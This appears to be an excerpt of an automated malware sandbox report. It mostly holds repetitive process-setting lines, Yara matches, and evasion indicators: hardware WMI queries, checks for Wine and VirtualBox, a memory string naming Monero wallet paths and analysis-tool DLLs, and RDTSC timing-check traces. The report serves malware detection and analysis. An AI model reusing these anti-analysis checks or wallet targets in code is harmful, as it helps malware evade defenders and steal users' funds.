Source: C:\Windows\System32\svchost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-9E297.tmp\PsIhedmEA44FNRssEU8V9OlH.tmp Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\ProgramData\jewkkwnf\jewkkwnf.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Source: Yara match File source: 23.2.RegAsm.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.7wpHB_IZvVwIDf0EgO_TfPH6.exe.32b5570.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.7wpHB_IZvVwIDf0EgO_TfPH6.exe.32b5570.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 23.2.RegAsm.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000B.00000002.2146809633.00000000032B5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000017.00000002.2753591127.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: gobEmOm5sr.exe PID: 7500, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: 7wpHB_IZvVwIDf0EgO_TfPH6.exe PID: 8048, type: MEMORYSTR
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Evasive API call chain: GetPEB, DecisionNodes, Sleep
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: 7wpHB_IZvVwIDf0EgO_TfPH6.exe, 0000000B.00000002.2146809633.00000000032B5000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: INMPM20IXQUGN9:-?5(\C!7%{->^WALLET_PATHSOFTWARE\MONERO-PROJECT\MONERO-CORE.KEYS\MONERO\WALLET.KEYS\\\*.*\\...\\\\\\\\\\\\HAL9THJOHNDOEDISPLAYAVGHOOKX.DLLAVGHOOKA.DLLSNXHK.DLLSBIEDLL.DLLAPI_LOG.DLLDIR_WATCH.DLLPSTOREC.DLLVMCHECK.DLLWPESPY.DLLCMDVRT32.DLLCMDVRT64.DLL16:28:0516:28:0516:28:0516:28:0516:28:0516:28:05DELAYS.TMP%S%SNTDLL.DLL
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: E241C7 second address: E241CB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: E241CB second address: E241ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F8C24FD04D7h 0x0000000b push esi 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: E2430E second address: E2431F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 jc 00007F8C2504F38Ch 0x0000000b rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: E2431F second address: E2434E instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F8C24FD04D5h 0x00000008 pushad 0x00000009 popad 0x0000000a jmp 00007F8C24FD04CDh 0x0000000f jno 00007F8C24FD04CCh 0x00000015 pop edx 0x00000016 pop eax 0x00000017 push eax 0x00000018 push edx 0x00000019 jns 00007F8C24FD04CCh 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: E2434E second address: E24352 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: E25E36 second address: E25E5E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 pushad 0x00000008 jmp 00007F8C24FD04CDh 0x0000000d pushad 0x0000000e popad 0x0000000f popad 0x00000010 popad 0x00000011 push eax 0x00000012 pushad 0x00000013 pushad 0x00000014 jne 00007F8C24FD04C6h 0x0000001a push ecx 0x0000001b pop ecx 0x0000001c popad 0x0000001d pushad 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: E25E5E second address: E25E98 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 popad 0x00000008 mov eax, dword ptr [esp+04h] 0x0000000c pushad 0x0000000d jc 00007F8C2504F393h 0x00000013 jmp 00007F8C2504F38Dh 0x00000018 push edi 0x00000019 pushad 0x0000001a popad 0x0000001b pop edi 0x0000001c popad 0x0000001d mov eax, dword ptr [eax] 0x0000001f push eax 0x00000020 push edx 0x00000021 pushad 0x00000022 jmp 00007F8C2504F38Dh 0x00000027 push ecx 0x00000028 pop ecx 0x00000029 popad 0x0000002a rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: E25F6F second address: E25F75 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: E25F75 second address: E25FE1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp+04h], eax 0x0000000c push eax 0x0000000d jmp 00007F8C2504F38Bh 0x00000012 pop eax 0x00000013 pop eax 0x00000014 js 00007F8C2504F3A3h 0x0000001a call 00007F8C2504F396h 0x0000001f jnl 00007F8C2504F386h 0x00000025 pop edi 0x00000026 push 00000003h 0x00000028 mov dh, bh 0x0000002a push 00000000h 0x0000002c mov cx, si 0x0000002f jnp 00007F8C2504F38Ch 0x00000035 or esi, dword ptr [ebp+122D3916h] 0x0000003b push 00000003h 0x0000003d call 00007F8C2504F38Eh 0x00000042 pop edx 0x00000043 push 8341DC5Eh 0x00000048 push edi 0x00000049 push esi 0x0000004a push eax 0x0000004b push edx 0x0000004c rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: E25FE1 second address: E26031 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pop edi 0x00000006 add dword ptr [esp], 3CBE23A2h 0x0000000d push 00000000h 0x0000000f push ebp 0x00000010 call 00007F8C24FD04C8h 0x00000015 pop ebp 0x00000016 mov dword ptr [esp+04h], ebp 0x0000001a add dword ptr [esp+04h], 00000017h 0x00000022 inc ebp 0x00000023 push ebp 0x00000024 ret 0x00000025 pop ebp 0x00000026 ret 0x00000027 movzx edx, cx 0x0000002a lea ebx, dword ptr [ebp+12455D5Bh] 0x00000030 or si, 5728h 0x00000035 xchg eax, ebx 0x00000036 push esi 0x00000037 push eax 0x00000038 push edx 0x00000039 jmp 00007F8C24FD04D2h 0x0000003e rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: E26031 second address: E2604B instructions: 0x00000000 rdtsc 0x00000002 jp 00007F8C2504F386h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop esi 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jno 00007F8C2504F38Ch 0x00000014 rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: E260F7 second address: E2612D instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp], eax 0x0000000a mov edx, 0F4D857Ah 0x0000000f push 00000000h 0x00000011 ja 00007F8C24FD04CCh 0x00000017 call 00007F8C24FD04C9h 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f jmp 00007F8C24FD04CDh 0x00000024 rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: E2612D second address: E26131 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: E26131 second address: E2613E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 push eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b push edx 0x0000000c pop edx 0x0000000d rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: E2613E second address: E26170 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 jp 00007F8C2504F386h 0x0000000f popad 0x00000010 popad 0x00000011 mov eax, dword ptr [esp+04h] 0x00000015 push esi 0x00000016 pushad 0x00000017 jmp 00007F8C2504F399h 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: E26170 second address: E2618F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop esi 0x00000006 mov eax, dword ptr [eax] 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b push esi 0x0000000c pop esi 0x0000000d jmp 00007F8C24FD04D1h 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: E2618F second address: E26194 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: E26194 second address: E261B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov dword ptr [esp+04h], eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e jmp 00007F8C24FD04CEh 0x00000013 pushad 0x00000014 popad 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: E261B3 second address: E261B9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: E261B9 second address: E261BD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: E261BD second address: E26217 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop eax 0x00000009 mov dl, 20h 0x0000000b push 00000003h 0x0000000d push 00000000h 0x0000000f push eax 0x00000010 call 00007F8C2504F388h 0x00000015 pop eax 0x00000016 mov dword ptr [esp+04h], eax 0x0000001a add dword ptr [esp+04h], 0000001Ch 0x00000022 inc eax 0x00000023 push eax 0x00000024 ret 0x00000025 pop eax 0x00000026 ret 0x00000027 mov edi, dword ptr [ebp+122D3B2Ah] 0x0000002d push 00000000h 0x0000002f jc 00007F8C2504F386h 0x00000035 push 00000003h 0x00000037 mov dword ptr [ebp+122D1A83h], ecx 0x0000003d push A033054Dh 0x00000042 push eax 0x00000043 push edx 0x00000044 jnl 00007F8C2504F38Ch 0x0000004a rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: E26217 second address: E2621D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: E2621D second address: E26221 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: E5A906 second address: E5A90A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: E64E46 second address: E64E5E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F8C2504F394h 0x00000009 rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: E65E69 second address: E65ED8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 nop 0x00000007 mov ebx, dword ptr [ebp+122D3B66h] 0x0000000d push dword ptr fs:[00000000h] 0x00000014 or bl, FFFFFFBBh 0x00000017 mov dword ptr fs:[00000000h], esp 0x0000001e clc 0x0000001f mov eax, dword ptr [ebp+122D03D1h] 0x00000025 push 00000000h 0x00000027 push ecx 0x00000028 call 00007F8C24FD04C8h 0x0000002d pop ecx 0x0000002e mov dword ptr [esp+04h], ecx 0x00000032 add dword ptr [esp+04h], 00000019h 0x0000003a inc ecx 0x0000003b push ecx 0x0000003c ret 0x0000003d pop ecx 0x0000003e ret 0x0000003f and ebx, 3A625D46h 0x00000045 push FFFFFFFFh 0x00000047 je 00007F8C24FD04D2h 0x0000004d jc 00007F8C24FD04CCh 0x00000053 jo 00007F8C24FD04C6h 0x00000059 nop 0x0000005a jp 00007F8C24FD04D8h 0x00000060 push eax 0x00000061 push edx 0x00000062 jp 00007F8C24FD04C6h 0x00000068 rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: E68D5D second address: E68D6A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: E69D1B second address: E69D1F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: E6AC51 second address: E6AC56 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: E6BDEC second address: E6BDF5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push edx 0x00000008 pop edx 0x00000009 rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: E6CD3B second address: E6CD4E instructions: 0x00000000 rdtsc 0x00000002 jc 00007F8C2504F388h 0x00000008 push eax 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push ebx 0x00000010 pushad 0x00000011 popad 0x00000012 pop ebx 0x00000013 rdtsc
